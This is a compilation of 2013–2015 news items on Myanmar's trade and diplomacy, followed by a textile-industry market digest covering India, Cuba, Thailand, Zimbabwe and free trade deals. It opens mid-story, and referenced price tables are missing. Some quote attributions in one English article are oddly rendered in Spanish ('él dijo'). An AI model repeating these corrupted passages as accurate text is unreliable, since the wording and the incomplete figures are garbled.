Presidential Communications Operations Office chief Herminio Coloma, Jr. said the deals are part of several agreements which will be signed following a bilateral meeting between Philippine President Benigno Aquino III and Myanmar President U Thein Sein who is in the country for a state visit.

The two leaders are also expected to forge an agreement on renewable energy, information cooperation, and visa exemption of ordinary passport holders.

Coloma said representatives from the chambers of commerce and industries of both countries will also sign an agreement to expand business opportunities and trade relations.

Following the signing of the deals, Myanmar will turn over its donation to the victims of the earthquake and typhoon Haiyan, locally named "Yolanda," to the Philippine Department of Social Welfare and Development.

Coloma said Aquino will tender luncheon for Thein Sein after the bilateral talks. The Myanmar leader will stay in the Philippines until December 6.

Dec 3, 2013

Myanmar mining bill with parliament, may be law by March - ministry official

Myanmar's new mining law, designed to help clear the way for foreign investment in the country's huge minerals sector, could be enacted as soon as March, an official with the country's Ministry of Mines said on Wednesday.

The ministry submitted a draft of the new mining law to parliament on Oct. 1, said Aung Thuyein Win, a director at the ministry.

"We hope that parliament will approve it within three months," he said on the sidelines of a conference in Singapore, adding that after approval by parliament and the president, lawmakers would have 90 days to enact the law.

That means it could be law by March, updating legislation dating from 1994. The investment climate has changed rapidly since President Thein Sein took office in March 2011 after nearly half a century of military rule.

Myanmar is rich in minerals including gold, copper, lead, zinc, nickel, tin, antimony and chromite.

Myanmar has earned more than US$350 million from over 200,000 tons of fisheries products exported in the past eight months of this fiscal year (2013-14), according to Ministry of Livestock, Fisheries and Rural Development.

The country expected to earn US$ 440 million this year from the seafood export through the normal trade routes.

And it also expected to earn US$ 260 million from the seafood export through border trade route in this year.

The country has exported more than 96,000 metric tons of fisheries products through normal trade route and over 110,000 metric tons of the products through border trade route during the period.

In total, it expected to earn US$ 700 million from the seafood export through both routes for the whole year.

Last fiscal year, the country earned more than US$ 650 million from the seafood export which went mostly to China.

Eel and crab were the biggest earners for export among others during this year.

Source: Eleven Weekly Media

Construction starts on Japan-Myanmar JV industrial complex in Yangon

The construction of a joint venture industrial complex between Japanese and Myanmar companies started Saturday in Yangon with an official ribbon-cutting and ground-breaking ceremony held at the site.

The industrial complex, located inside the Thilawa Sepecial Economic Zone, about 23 kilometers south of the city center of Yangon, is expected to draw businesses involved in apparel, car manufacturing and other services, upon its completion in 2015.

The consortium, joined by three major Japanese trading firms, the government of Myanmar and nine local Myanmar companies, plans to prepare roads, sewage treatment equipment and other infrastructure at the 400-hectare area inside the 2,400-hectare Thilawa Special Economic Zone.

Mitsubishi Corp. Marubeni Corp. and Sumitomo Corp. will jointly hold a 49 percent stake in the consortium, to be capitalized at $100 million, while the remaining 51 percent will be owned by the Myanmar government and local private companies.

Speaking at the ceremony held at the construction site, Set Aung, chairman of the Thilawa Special Economic Zone management committee, said the event signifies "closer and stronger relationship and friendship" between Myanmar and Japan, adding that the project would open up "a new chapter" in the history of Myanmar, a largely untapped market in Asia.

The development of the Thilawa SEZ, the first-ever special economic zone in Myanmar, would not only contribute to the economic development of the country, but also to the locals residing in and around the area with increased employment opportunities, income, and consumption, he said.

He expressed hope that the project would attract more foreign investment to Myanmar, and pledged cooperation with the developers and the investing companies for the successful establishment of the SEZ.

"We stand ready for better coordination, facilitation and to provide any necessary assistance to all the stakeholders, especially to the developers as well as investors," Set Aung said.

Yoshihiko Isozaki, parliamentary vice minister of economy, trade and industry of Japan, who attended the ceremony as a guest of honor, said in his speech that the project would create job opportunities for ordinary Myanmar people.

"It is important that job opportunities can be created by receiving investments from abroad, so that the people of Myanmar can enjoy the fruits of the reforms," Isozaki said.

Many Japanese companies remain undecided about investing in Myanmar due to procedural complications, and so solving such issues to pave the way for potential investors to actually come in and create jobs for the locals would be the key to the success of the Thilawa SEZ, he added.

Source: Kyodo News International

Chinese enterprises in Myanmar join flood relief efforts: ambassador

2015-08-10 09:33 Xinhua Editor: Gu Liping

Chinese enterprises in Myanmar have joined the country's relief efforts in flood-hit areas, while relief aid from the Chinese embassy and companies are being transported in, Chinese ambassador Hong Liang has told Xinhua following his tour in the worst-hit Sagaing region and Rakhine state.

Noting that the China-Myanmar relationship is based on the friendship between the two peoples, Hong said, "As a Chinese ambassador to Myanmar, my prime duty of coming to Myanmar is to enhance such traditional friendship between the people of the two countries."

"This year, Myanmar experienced such a great flood disaster which hasn't been seen in the past four decades. The flood victims were moved and excited on witnessing the urgently needed relief materials reaching them.

"Myanmar needs the assistance rendered by neighboring countries and the international community. As a friendly neighbor of Myanmar, China should extend a helping hand."

The ambassador said Chinese enterprises investing in Myanmar have actively and aggressively turned out to help and are currently carrying their relief goods to the flood-stricken areas.

President of the Chinese Chamber of Commerce and Industry Lv Dexing told Xinhua that the organization has arranged the first shipment of urgently-needed relief materials to the Magway region in central Myanmar, which will be followed by two more batches.

China National Petroleum Corporation (CNPC) said since the occurrence of the flood, the South-East Asia Crude Oil and Natural Gas Pipeline Co. Ltd. have launched fund-raising activities and will start traveling to Rakhine state and Magway region for donations on Friday.

Hong, the ambassador, said the first large batch of urgently - needed relief materials extended by the Chinese government will be transported to Myanmar from Beijing by chartered plane, adding that China has also provided Myanmar with weather-related satellite data and disaster-assessment equipment which Myanmar said are useful in disaster prevention and management.

He said the Chinese flood relief aid shipment from the Yunnan provincial government has arrived in Mandalay via the border gate at Muse and a handover ceremony will be launched.

The relief aid include tents, milk powder, instant noodles and rice.

Hong added that Chinese civil organizations at home are also joining in Myanmar's relief efforts with the Blue Sky Rescue team having arrived in Sagaing region to begin the search and relief operation for people trapped in the flood waters.

Zhang Yong, leader of the rescue team, Myanmar President U Thein Sein expressed thanks to the members of the team when he inspected the areas, urging local authorities to coordinate with the team in operation.

Hong said China has disaster management ability and is ready to enhance cooperation with neighboring countries in management.

"Natural disasters pose the biggest threat to the region, more so than clashes between countries," he pointed out, calling for common challenges to be dealt with by jointly establishing a communal relief system.

Severe floods, triggered by heavy rainfall since June, have affected 13 regions and states out of 14 in Myanmar, destroying houses, farmland, railway lines, bridges and roads.

The Myanmar government has declared four disaster zones namely Rakhine, Chin, Sagaing and Magway, of which Rakhine state was the worst hit.

The flood has brought the death toll nationwide to 88, affecting more than 330,000 people across the nation and flooding 474,000 hectares of farmland.

In the latest development, flood water has begun to gradually retreat in the north and move southwards and is likely to expand and affect the southern part of the country.

MARKET WATCH 19 March, 2015

Textile Raw Material Price 2015-03-19

Source: Global Textiles

Note: The above prices are Chinese Price (1 CNY = 0.16246 USD dtd. 18/03/2015)

The prices given above are as quoted from Global Textiles. com. SRTEPC is not responsible for the correctness of the same.

Maharashtra Budget outlays Rs 59cr towards textile subsidy

For the development of textile industry in the state, Maharashtra finance minister Sudhir Mungantiwar proposed an outlay of Rs 59.66 crore in his Budget speech for the year 2015-16 towards interest subsidy of 5 to 7 per cent on long term loan of the eligible textile industrial units in the state under the Textile Policy. Mungantiwar also proposed an outlay of Rs 28 crore towards 10 per cent capital subsidy on the long term loan of eligible textile industrial units in Vidarbha, Marathwada and North Maharashtra.

“For the regular scheme of power subsidy to power looms an outlay of Rs 1232.53 crore is proposed,” the minister said. The minister also proposed to start a new Industrial Cluster Development scheme to boost development of industrially backward areas. For this, an outlay of Rs 26.50 crore is proposed in the year 2015-16. The government has launched a unique programme called ‘Make in Maharashtra’ with an objective of retaining the premium position of the state in industrial development and economic progress of the state.

“Under the ‘Make in Maharashtra’ programme, the investors who are willing to invest in the State will benefit by simplified and easier procedures while obtaining various permissions to start an industry thereby reducing the time required to complete various procedures,” the minister said.

Maharashtra Budget 2015: BJP govt abolishes LBT, extends tax exemption on rice, wheat

Maharashtra today announced Local Body Tax (LBT) would be abolished from August 1 and extended tax exemption on essential commodities like rice and wheat in Budget 2015-16. As regards LBT, a compensation of Rs 6,875 crore will be given to the municipal corporations, excluding Mumbai. This was one of the main electoral promises of the Bharatiya Janata Party (BJP). The loss of revenue would be compensated by enhancing the rate of tax under VAT which will be applicable to the whole state, Maharashtra Finance Minister Sudhir Mungantiwar told the Assembly while presenting his maiden budget in the state Legislature here.

A revenue neutral rate has been recommended considering the share of increased tax collection to be given to the areas where LBT is not levied, he said adding that extensive deliberations are required on enhancement of tax rates under VAT. The Mumbai municipal corporation gets substantial revenue by levying octroi on crude oil. The octroi amount is collected by oil companies as part of the state specific duty from all consumes in the state. This aspect is also required to be taken into account, the minister said. The total plan size of the state is Rs 54,999 crore and the budget estimates for 2015-16 are Rs 1,98,230.50 crore. As per the estimates, the revenue deficit would be Rs 3,757.40 crore.

Mungantiwar, who presented a surplus budget of Rs 107.10 crore, also announced tax proposals which are estimated to result in net revenue gain of Rs 643 crore, which has been incorporated in the budget estimates of 2015-16. He proposed a levy of 5 per cent entry tax on long steel, 12.5 per cent tax on all types of wood-free plain and pre-laminated particle boards. He also announced extension of tax exemption on essential commodities like rice, wheat, pulses and their flour, turmeric, chillies, tamarind, jaggery, coconut, dates, Solapuri chadars and towels upto March 31, 2016.

The tax exemption on currants and raisins as well as 5 per cent tax on tea will also continue till March 31, 2016. The Minister said that women drawing salary upto Rs 10,000 per month will not have to pay professional tax. This will benefit nearly 1.5 lakh women in the state. He also proposed to reduce sales tax on ladies’ purse and handbags from 12.5 per cent to 5 per cent. Besides, work books, graph books, drawing books and laboratory books for students have been made tax-free. The rate of excise duty on country liquor would now be 200 per cent of the manufacturing cost or Rs 120 per proof litre, whichever is higher.

Certain medicines required for treatment of cancer will also be exempted from tax and a list of such drugs would be notified separately. Mungantiwar also proposed to reduce tax on guide wire required for medical treatment and LED bulbs from 12.5 per cent to 5 per cent. Mungantiwar said new automation project for sales tax has been started which will help business and the sales tax department in further simplification of procedures. All the processes envisaged under the GST are being incorporated in the new software system under development, so it will make hassle-free migration of data of existing tax payer to the new GST system. He also announced enhancing premium on additional FSI which will result in substantial revenue gains.

The minister said the government has promised to enhance the FSI limit from 0.33 to 0.60 and increase the rate of premium in Brihanmumbai Municipal Corporation limit. It is also under consideration of the government to enhance the rate of premium on grant on all kinds of FSI. These gains in FSI will benefit individuals, but the government does not get benefit of revenue increase in the same proportion. These amendments are proposed to ensure legitimate share of revenue for the government from overall benefits accruing to the beneficiaries of the FSI without burdening the common man, he said. The government intends to grant timely permissions, simplify procedures and charge legitimate premium on additional benefits.

As part of the amendments in the Maharashtra Value Added Tax Act, there will be no VAT on service tax and late fee for VAT return will be reduced from Rs 2,000 to Rs 1,000. Similarly, multiple revised returns in case of audit findings or investigation proceedings by sales tax authorities would be allowed. Assessment can be initiated if there is reason to believe that the tax payer is not correctly discharging tax liability or is attempting to evade tax on any transaction. The Finance Minister also proposed to introduce time limit for completion of transaction-wise assessment and also provide for cancellation of order, if it is done ex-parte. Computation of interest in case of a revised return filed for a period less than a year is also proposed. After the High Court approves merger or demerger of companies, a period of 30 days will be specified for making an application for registration from the date of notification by the registrar of companies, he added.

SOURCE: The Financial Express

Sutlej Textiles to acquire Birla Textile Mills

K. K. Birla Group flagship company Sutlej Textile and Industries Ltd has got approval from its Board of Directors to acquire another group company, Birla Textile Mills, which is a unit of Chambal Fertilisers and Chemicals Ltd located at Baddi in Himachal Pradesh, on the basis of a slump sale. Slump sale is the transfer or sale of one or more undertakings for a lump sum where no values are assigned to individual assets and liabilities.

According to the filing, the Board of Directors took this decision at their meeting held on March 14 and the transaction is subject to requisite approvals. The parties are currently negotiating and finalizing the terms of the business purchase and transfer agreement and the other related transaction documents, and shall sign these documents as soon as there is consensus. The transaction is subject to requisite approvals, the company said.

The plant of Birla Textile Mills in Himachal Pradesh has a total installed capacity of 40,320 spindles, while another 40,000 spindles were added in 2006, extending the total to 83,320, according to the company’s website. Birla Textile mills started its commercial production in May 2000. Sutlej Textiles and Industries was incorporated in June 2005 out of a corporate restructuring exercise of Sutlej Industries Ltd and DamanGanga Processors Ltd. It has 260,872 spindles for spinning yarn, six million metres a year for apparel fabrics, 1.6 million trousers a year and 3 million metres a year for home textiles fabric. It has plants in Jammu and Kashmir, Rajasthan and Gujarat.


Indian economy to grow 7.7 per cent this year, says OECD

Days after IMF chief Christine Lagarde described India as a "bright spot" on cloudy global horizon, the Organisation for Economic Cooperation and Development (OECD) has said the country is expected to become the fastest-growing major economy over the next two years. In its 'Interim Economic Assessment', the OECD has forecast Indian economy will grow 7.7% in 2015 and 8% in 2016. China is pegged to grow at 7% in both these years, even as the world economy is forecast to do moderately better than expected a few months ago. "The Indian economy is set to perform strongly, if key challenges can be overcome," the Paris-based think tank said on Wednesday.

"India is now expected to be the fastest-growing major economy in 2015-16, overtaking China," it said, even as it warned that obstacles are emerging to reforms in the country. In its previous assessment, in November 2014, the OECD had forecast 6.4% growth in 2015 and 6.6% in 2016. Part of the upward revision is due to revamp in India's GDP numbers that has bumped up growth from what was earlier estimated under the factor cost method.

The new numbers follow the internationally accepted market prices based system of estimating GDP and showed that the economy expanded 6.9% in 2013-14, compared to 4.7% estimated under the earlier method. "Part of this relative improvement reflects significant revisions to past GDP data, which raise the base growth rate through 2014," the OECD said. India's own assessment is that the economy will grow between 8.1% and 8.5% in 2015-16. The statistics office has pegged the rate of growth in the current year at 7.5%.

The OECD said that the recovery is actually slower than anticipated earlier. "The projected acceleration in growth this year is actually smaller than foreseen in the November 2014 Economic Outlook, reflecting sluggish growth of investment and exports," it said. The report also carried a warning on the pace of reforms, echoing frustration voiced by some business leaders over the lack of progress on the ground.

"With obstacles emerging to the adoption of growth-friendly structural reforms, maintaining rapid growth will pose a difficult challenge, notwithstanding the strong current momentum," it said. The low oil prices and monetary easing are providing support to global growth, the OECD said. "Lower oil prices and widespread monetary easing have brought the world economy to a turning point, with the potential for the acceleration of growth that has been needed in many countries," said OECD chief economist Catherine L Mann. Strong domestic demand in the United States is also benefiting other countries. The OECD projects the US will grow 3.1% in the current year and 3% in 2016. The report warned that excessive reliance on monetary policy to prop up growth is creating financial risks without yet reviving business investment. "A more balanced policy approach is needed, making full use of fiscal and structural reforms, as well as monetary policy, to ensure sustainable growth and public finances over the longer term," it said.

SOURCE: The Economic Times

India, Cuba look to inject new life into relations

India and Cuba will seek to engage in the pharma and public transport sectors during a rare high-level political visit from the Caribbean country in the last four decades. Cuban first vice-president Miguel Diaz-Canel’s trip, starting next week, assumes importance in the light of the West lifting long-standing sanctions imposed on the country. As the $121-bn Cuban economy opens up, it gives India an opportunity to further push its business interests beyond Latin America to the Caribbean.

During the trip, Diaz-Canel will meet Prime Minister Narendra Modi and other senior officials. On the agenda is expediting a bilateral investment treaty and cooperation in sectors of India’s interest, such as pharmaceuticals, automobiles and science and technology. A senior Indian diplomat said: “This is the right time for India to step in and take advantage of the huge opportunities that are opening up in that country with a population of over 11 million.”

In Cuba — as in much of Latin America — India is trying to at least hold on to, if not expand, its influence at a time China has emerged a key investor, donor and trade partner. The 33-member Community of Latin American and Caribbean States (CELAC), of which Cuba is an integral part, wants to boost economic ties with BRICS nations. During a recent Delhi visit, Cuban foreign minister Bruno Rodríguez Parrilla said: “We wish to seek a higher level of economic cooperation with India and other BRICS nations.” Parrilla said Cuba and other CELAC members had considerable amount of expertise and resources to offer to Indian companies in the pharmaceutical sector.

During Diaz-Canel’s visit, the Modi government plans to resurrect a proposal of gifting Cuba 25 buses for public transport in Havana. The plan had fallen through due to US sanctions, as Tata buses have American components. The plan was to gift 25 buses and then another 200 to Cuba. The personal role of President Fidel Castro in forging the India-Cuba alliance is well known. The image of Cuban leader Fidel Castro in a bear-hug with then Prime Minister Indira Gandhi in 1983, while handing over the NAM chairmanship to her in 1983, had become iconic. But in a world where international affairs are ruled increasingly by pragmatism, the challenge for New Delhi is whether it can build on the goodwill of a historic alliance, based largely on an increasingly irrelevant ideology, and craft a new partnership for a new world.

SOURCE: The Financial Express

Forex reserves at all-time high, but far from pre-crisis adequacy levels

India’s foreign exchange reserves, at an all-time high currently, are still far off from pre-crisis adequacy levels, which, perhaps, is the reason the Reserve Bank of India’s dollar purchases are not slowing down. Forex reserves were at $338 billion as of February 27, up $43.7 billion from a year ago on the back of aggressive dollar buying by the central bank. The RBI’s dollar purchase in January was $12.14 billion, the highest monthly buy in seven years. Dealers said the central bank has been buying dollars even in February and March albeit the frequency has slowed.

The adequacy of reserves is gauged mainly through their import cover which is the extent of import payments the reserves can meet at a given point in time. A cover of minimum three months is considered essential for stability. Forex reserves at the current level offer an import cover of 11 months, an improvement from an import cover of around 7 months in the last one year. However, this coverage is yet to reach pre-crisis levels of 14 months in March 2008.

The cover has increased due to a rise in reserves as well as a simultaneous fall in the country’s merchandise imports. Imports have shrunk, simply due to a fall in the global oil prices that have already started climbing up again. Imports fell 15.66% to $28.39 in February and the Indian crude oil basket price averaged around $59 during that month. Economists say that since adequacy is a judgment call, RBI could be playing it cautious as a possible reversal of dollar flows becomes a plausible threat in the near future. “We believe the reserves should accumulate to $370 billion,” said Shubada Rao, chief economist at YES Bank. Following a meeting with the finance minister, RBI governor Raghuram Rajan, on Wednesday, said the country’s forex reserves are “significant” and, therefore, the RBI is prepared for any major dollar outflows.

With the US Federal Reserve expected to tighten monetary policy, analysts are forecasting dollar outflows from emerging market economies including India. On Tuesday, the International Monetary Fund had warned that the emerging market economies should prepare for greater volatility in markets as the Fed readies to tighten its policy. “It is very difficult to say what level of reserves is adequate. But one can never rest easy over reserves. We also need to see reserves in relation to external debt and capital flows,” said Saugata Bhattacharya, chief economist at Axis Bank.

SOURCE: The Financial Express

Global crude oil price of Indian Basket was US$ 51.46 per bbl on 18.03.2015

The international crude oil price of Indian Basket as computed/published today by Petroleum Planning and Analysis Cell (PPAC) under the Ministry of Petroleum and Natural Gas was US$ 51.46 per barrel (bbl) on 18.03.2015. This was higher than the price of US$ 51.42 per bbl on previous publishing day of 17.03.2015.

In rupee terms, the price of Indian Basket increased to Rs 3225.00 per bbl on 18.03.2015 as compared to Rs 3223.52 per bbl on 17.03.2015. Rupee closed stronger at Rs 62.67 per US$ on 18.03.2015 as against Rs 62.69 per US$ on 17.03.2015.

The table below gives details in this regard:

President Obama Launches Competition for New Textiles-Focused Manufacturing Innovation Institute; New White House Supply Chain Innovation Initiative; and Funding to Support Small Manufacturers

Today the President is announcing nearly $500 million in public-private investment to strengthen American manufacturing by investing in cutting-edge technologies through a new, textiles-focused manufacturing institute competition led by the Department of Defense, and by sharpening the capabilities of small manufacturers through Manufacturing Extension Partnership competitions in twelve states. The White House, as detailed in a new report, is also launching a Supply Chain Innovation Initiative focused on building public-private partnerships to strengthen the small U. S. manufacturers that anchor the nation’s supply chains.

The President’s Fiscal Year 2016 Budget, to create jobs and strengthen America’s leadership in advanced manufacturing technology, provides the resources to double the number of manufacturing innovation institutes nationwide to 16 by the end of 2016 and fulfills the President’s goal of building a network of up to 45 institutes over the decade. In contrast, the House Republican Budget released yesterday entrenches the harmful sequester levels of funding and proposes to eliminate the Manufacturing Extension Partnership, putting at risk critical investments in advanced manufacturing, workforce development and training, and innovation proposed in the President’s Budget.

After a decade of decline in the 2000s when 40 percent of all large factories closed their doors, American manufacturing is adding jobs at its fastest rate in decades, with 877,000 new manufacturing jobs created since February 2010. Ohio alone has added nearly 70,000 manufacturing jobs over that period. Manufacturing production is up by almost a third since the recession and the number of factories manufacturing across the United States is growing for the first time since the 1990s. In addition to announcing new competitions for nearly $500 million in public and private investment the President is calling on Congress to do its part to make the bipartisan investments needed to strengthen manufacturing across the United States, including in places like Ohio.

Investing Nearly $500 Million to Strengthen U. S. Advanced Manufacturing:

More than $150 Million in Public-Private Investment through a New Manufacturing Innovation Institute Competition

Today, the Department of Defense is launching a competition for leading manufacturers, universities, and non-profits to form a new manufacturing hub focused on revolutionary fibers and textiles technologies. The $75 million federal investment will be matched by more than $75 million of private sector resources.

This is the ninth competition for a National Network for Manufacturing Innovation institute, and the first of eight new institutes that the President’s budget proposes to fund by the end of 2016. Returning to sequestration levels for appropriations, as the House Republican Budget proposes, would put this expansion at risk.

The first institute awarded is in Youngstown, Ohio. Only in its third year, it is already drawing investment to Ohio—including a $32 million job-creating investment in the region from GE—and advancing research that will help accelerate the speed of 3-D printing in metals by a factor of ten.

$320 Million Competition to Strengthen Small Manufacturers in 12 States

Non-profits in 12 states will compete for $158 million in Federal funds matched by $158 million or more in private investment over five years to provide technology and engineering expertise to small manufacturers through the latest round of competitions to strengthen the Manufacturing Extension Partnership (MEP)’s network of centers in these states.

Today, the President will tour MAGNET’s Manufacturing Innovation Center at Cleveland State University, the Ohio Manufacturing Extension Partnership affiliate.

In contrast, the House Republican Budget proposes to end funding for the MEP, dealing a blow to the 30,000 small manufacturers the program serves, including the more than 450 Ohio manufacturers served by MAGNET, the Ohio MEP affiliate, in recent years.

New White House Supply Chain Innovation Initiative

The President will unveil a White House Supply Chain Innovation Initiative focused on building public-private partnerships to strengthen the small U. S. manufacturers and a new report on the need to further strengthen small manufacturers that form the backbone of America’s supply chains and play an increasingly important role in creating and retaining manufacturing jobs and investment in the United States.

SOURCE: The White House

Myanmar garment firms explore Paris & Berlin markets

Representatives of nine top Myanmar based apparel factories went to Paris and Berlin last month in order to get a better understanding of European markets and European buyers’ requirements. “The participants were able to gain insights into the multilayered European textile market by visiting two major garment and textile trade shows located in Paris and Berlin,” SMART Myanmar said on its website. “The trade fairs gave them the chance to establish new business contacts as suppliers and to start practice dialogue with Asian and European partners,” Smart Myanmar added. At the same time, visiting the fairs provided the participants with highly needed sourcing knowledge as a high number of Asian exhibitors were present with their products like fabrics and accessories.

The Myanmar garment manufacturers said they wished to add more value to their garment production by moving from the so called Cut Make Pack (CMP) business model to the higher margin Free On Board (FOB) production. Through a systematic analysis of European shops, ranging from low level to high level price range, the entrepreneurs extended their knowledge on characteristics of the European market conditions. A key event of the trip was an intensive dialogue with German buyers during a B2B meeting organised jointly with German Fashion Confederation and the Confederation of the German Fashion and Textile Industry.

In Paris, the main points on the agenda were shop and product analysis as well as the visit of one of the world’s major trade fairs in the textile sector, Tex World. Giovanni Beatrice, Dutch garment expert held an introductory session where he provided the group with a tool for shop and product analysis as well as a tool for efficient price enquiries regarding suppliers. During their visit of TexWorld, the delegation had the chance to speak both to buyers and to suppliers. During the analysis sessions about the garment products being sold in Paris shops, they visited and analysed more than 30 shops in Paris.

In Berlin, the participants visited the trade fair, Asia Apparel. Here, they received a good overview about their competitors from China, Bangladesh and other Asian countries. Like in Paris, product as well as shop analyses were conducted in Berlin and they compared shops ranging from C&A to Louis Vuitton, had a look at alternative shop concepts like TK Maxx. The delegates also met with SMART Myanmar’s project director, Simone Lehmann in order to continue work on the Code of Conduct of Myanmar garment factories. Both in Paris and Berlin, it emerged that Myanmar companies have a good reputation and that buyer companies start considering Myanmar as an alternative to countries like China and Bangladesh. “Myanmar is not only offering comparably cheap labour, but has also made considerable progress in its reforms of relevant laws that set conditions for doing business in Myanmar,” SMART Myanmar informed.

Indorama Ventures signs definitive share purchase agreement with Bangkok Polyester

Thailand’s Indorama Ventures Public Company Limited (IVL) informed on Wednesday that its subsidiary Indorama Petrochem Limited, Thailand has signed a definitive share purchase agreement with Bangkok Cable Company, Limited, a major shareholder, to acquire 94.91 percent equity stake in polyethylene terephthalate (PET) polymers maker Bangkok Polyester Public Company Limited (BPC), Thailand.

Bangkok Polyester is a producer of PET polymers in Rayong, Thailand, with an annual capacity of 105,000 tons. The transaction, subject to customary approval, is expected to be completed in the second quarter of 2015. IVL’s PET segment accounts for half of the company’s overall production. As of end-2014, its PET capacity stood at 3.1m tonnes, up 7% from 2.9m tonnes in 2013. In February, IVL had said that it will shell out a total of $2.2bn in capital expenditures over three years (2015-2018)– $1.9bn for growth and $300m on maintenance. The capex will be funded through a combination of cash flow and debt.

The company has announced $600m worth of projects that it will invest on, with additional projects worth $900m “under active discussions”, it said in the notes accompanying its full-year financial results. If all the projects are completed this year, IVL said that they should boost the company’s capacity by a quarter. Among IVL’s acquisitions that will be completed this year is Polyplex Turkey – the Thai firm’s second plant acquisition in the European country.

The deal, expected to close in the first quarter of 2015, will bring Indorama’s capacity in Turkey to 382,000 tonnes/year, following its acquisition of the 130,000 tonnes/year Artenius Turkpet PET plant last year. In December 2014, IVL had signed a definitive agreement to fully acquire Performance Fibers Asia (PF Asia), which producres 41,000 tonnes/year of polyester tyre cord frabic and 48,000 tonnes/year of polyester tyre cord yarn in China's Guangdong province.

Zimbabwe govt grants 1 year rebate to clothing and textile industry

At the time when Zimbabwean clothing sector is facing stiff competition from cheap imports that have flooded the market, making locally manufactured clothing uncompetitive. The government has granted a one-year rebate to the clothing and textile industry which will allow 52 manufacturers to import textile materials duty-free. Rebate is an amount paid by way of reduction, return, or refund on what has already been paid or contributed.

The Ministry of Finance granted a one-year reprieve ending December 2015 as part of efforts to boost the operations of local producers, according to statutory Instrument 32 of 2015 cited as Customs and Excise (Clothing manufacturer) rebate Regulations gazetted on March 6 2015. These regulations may be cited as the Customs and Excise Clothing Manufacturer Rebate Regulations 2015. These regulations shall be deemed to have come into effect on January 1 2015 and shall be valid for a period of twelve months to December 31 2015.

Treasury said that the rebate duty shall be granted on material referred to in the second schedule imported or taken out of bond by a manufacturer for use in the manufacture of clothing. Materials eligible for the rebate include cotton sewing thread containing 85% or more by weight of cotton, cotton sewing thread, denim, plain weave weighing more than 100g per square metre, sewing thread of man-made staple fibres, not put up for retail sale, woven fabrics of polyester staple fibres, chenille fabrics, tulles and other net fabrics.

Companies that will qualify to import raw materials under the rebate include Archer Clothing, James North Zimbabwe, Enbee Stores and Carousel (Private) Limited among others. Last year, government in partnership with the private sector launched the cotton-to-clothing strategy as part of efforts to revive the sector. The textile and clothing industry at its peak used to employ at least 35 000, but the figure has since plunged to about 8 000 due to a number of problems bedevilling the industry.

The China – Australia free trade agreement to include MFN provisions

Australia's biggest-ever bilateral trade deal is set to grow much bigger, with China agreeing to a special ratchet clause that will ensure that future benefits conferred to other countries will flow automatically to Australia. The much-coveted "most favoured nation" provisions in the China-Australia Free Trade Agreement have been kept under wraps at the request of Chinese negotiators, who were pursuing a parallel deal with South Korea.

Trade Minister Andrew Robb confirmed the MFN provisions in an interview with Fairfax Media. "This is huge, I think," said Mr Robb. "It means that we will automatically receive the same treatment provided by China to any other country in the future including the EU and the United States." Australian negotiators, analysts and industry bodies were surprised at the range of liberalisation commitments that China committed to during President Xi Jinping's visit to Canberra in November. The full text, which will not be released until later this year, will include unprecedented commitments over a range of service sectors, including education and financial services.

Some China analysts speculated that Mr Xi may have been using the Australia trade deal as a lever to liberalise his own economy, which is starting to strain under the weight of bad debts and rash investments. The previously unreported MFN mechanisms take the deal to another level. Australian negotiators are most enthused by potential MFN gains on the investment side. The "prize" will be a special "negative list" feature that China looks set to provide the US under a bilateral investment treaty, which would greatly increase the range of Australian investment opportunities. Similarly, Australian fund managers could potentially gain majority ownership rights in Chinese counterpart firms, up from a ceiling of 49 per cent in the existing FTA, if the US manages to get what it is seeking. "This MFN clause was something we had long sought but didn't really believe we could get," said Geoff Raby, the former ambassador to China who had been involved with negotiations for a decade before stepping down to take on corporate directorships and advisory roles. "It is a big achievement by Robb and the team to have secured this." Mr Robb told Fairfax Media the MFN provisions would apply to investment and services chapters. He said a separate review mechanism had been built into the "goods" provisions, which would apply three years after the agreement entered into force and then every five years thereafter. "On most fronts, if not all, those will be protected, locked in, in the future when China make concessions with other countries," Mr Robb said. "Overall this means we have substantially [greater] preferential arrangements than any other trading partner."

Dr Raby, a director of Fortescue, said there had been considerable political resistance on both sides when he first floated the idea of a China trade deal to his ministers in 2003, when the Howard government was concluding a trade deal with the US. He said Chinese officials had been been anxious that they had paid too high a price for accession to the World Trade Organisation and Australians were unhappy at having to grant China "market economy" status even before negotiations had begun. "It was the first time a developed country had engaged China on this idea," él dijo. Dr Raby said the MFN provisions would be particularly important for investors because China was negotiating an ambitious bilateral investment agreement with the US. "It is extremely valuable as it preserves our position as China negotiates other FTAs so the benefits which we have 'paid' for in the negotiations can't be whittled away," Dr Raby said.

The chief executive of the Business Council of Australia, Jennifer Westacott, said the MFN deal would keep Australia "on a level playing field with key competitors for valuable trade with what is the growth engine of the world". "This opens the door to deep access to Chinese markets and a greater capacity to further diversify the Australian economy," ella dijo. Former Austrade chief economist Tim Harcourt agreed that the China deal had surpassed expectations but also warned that great challenges lay ahead in the implementation. "At the end of the day it's the internal decisions you have to deal with in China, where so much is determined by administrative fiat," said Dr Harcourt, now a lecturer and researcher in the MBA program at the University of NSW. "FTA or no FTA, you still have to have those connections to get your deal up," él dijo. "You've got to have the [Chinese Communist Party's] blessing right down through the ranks."

SOURCE: The Sydney Morning Herald

Israel and China to begin FTA talks

China will kick off negotiations on a proposed free trade agreement with Israel this year, the country's Ministry of Commerce said Tuesday. Israel is China's major economic and trade partner in the Middle East and along the route of China-proposed "belt and road" initiative, the ministry's spokesman Shen Danyang said at a press conference. The two sides have completed a feasibility study of the FTA "with a positive outlook," he said, adding it will lift bilateral cooperation to a new height. Bilateral trade has increased notably since the two countries established diplomatic ties in 1992. China is now Israel's third largest trade partner and the largest in Asia

SOURCE: The China Times

Ukraine to sign FTA with Canada, Israel, Turkey and other countries

According to the Minister of Agrarian Policy and Food of Ukraine Alexey Pavlenko, Ukraine plans to sign the FTA with Canada, Israel, Turkey, Serbia, and Vietnam. The Minister stated, the necessity of the free trade agreement signing is explained by the partial loss of the CIS countries markets. Thus in 2014 Ukraine decreased exports to the CIS countries by 31%. Meanwhile the country increased supplies to the Asian countries (+10%), EU (+6%) and Africa (+1%). Thus China is one of the most powerful and prospective market, so they are now negotiation on the trade conditions. Besides there are other large-scale players of the agrarian market being interested in the cooperation with Ukraine. The ones are Albania, Egypt, Jordan, Korea Republic, and Tunisia.

SOURCE: The FinChannel

Korean fashion fair at CHIC in Shanghai begins today

